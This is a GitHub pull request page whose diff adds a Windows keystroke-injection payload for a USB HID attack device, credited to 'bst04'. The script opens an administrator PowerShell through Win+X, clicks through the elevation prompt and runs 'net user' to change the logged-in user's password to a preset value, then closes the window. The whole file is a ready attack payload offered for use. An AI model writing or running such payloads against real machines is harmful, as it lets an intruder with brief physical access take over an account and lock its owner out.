Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 22 additions & 0 deletions windows/change_password.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
REM ================================
REM payload made by bst04
REM Windows Devices
REM change "password" with another
REM ================================

DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER

DELAY 2000
STRING net user $env:USERNAME
STRING "password"
ENTER
DELAY 1000

ALT F4